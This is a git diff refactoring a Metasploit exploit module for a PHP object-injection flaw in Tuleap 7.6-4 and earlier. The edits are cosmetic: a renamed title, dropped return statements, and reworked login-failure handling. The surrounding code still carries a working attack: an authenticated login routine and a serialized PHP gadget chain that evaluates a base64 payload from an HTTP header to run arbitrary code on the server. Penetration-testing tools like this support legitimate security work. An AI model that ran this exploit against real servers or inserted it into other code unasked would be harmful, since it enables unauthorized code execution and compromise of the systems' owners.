diff --git a/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb b/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb index bf56e21c13..949fe31b1f 100644 --- a/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb @@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Tuleap unserialize() PHP Code Execution', + 'Name' => 'Tuleap Unserialize PHP Code Execution', 'Description' => %q{ This module exploits a PHP object injection vulnerability in Tuelap <= 7.6-4 which could be abused to allow authenticated users to execute arbitrary code with the permissions of the @@ -53,7 +53,8 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.body and res.body.to_s =~ /#{flag}/ return Exploit::CheckCode::Vulnerable end - return Exploit::CheckCode::Safe + + Exploit::CheckCode::Safe end def do_login() @@ -68,13 +69,12 @@ class Metasploit3 < Msf::Exploit::Remote 'vars_post' => {'form_loginname' => username, 'form_pw' => password} }) - if res and res.code == 302 - print_status("#{peer} - Login successful with #{username}:#{password}") - return res.get_cookies + unless res && res.code == 302 + fail_with(Failure::NoAccess, "#{peer} - Login failed with #{username}:#{password}") end - print_error("#{peer} - Login failed with #{username}:#{password}") - fail_with(Failure::NoAccess, 'Login failed') + print_status("#{peer} - Login successful with #{username}:#{password}") + res.get_cookies end def exec_php(php_code) @@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote chain << 'a:1:{S:9:"debug_log";a:2:{i:0;O:34:"Transition_PostAction_FieldFactory":1:{S:23:"\00*\00post_actions_classes";' chain << 'a:1:{i:0;S:52:"1;eval(base64_decode($_SERVER[HTTP_PAYLOAD]));die;//";}}i:1;S:16:"fetchPostActions";}}}}' - return send_request_cgi({ + send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'project/register.php'), 'cookie' => session_cookies,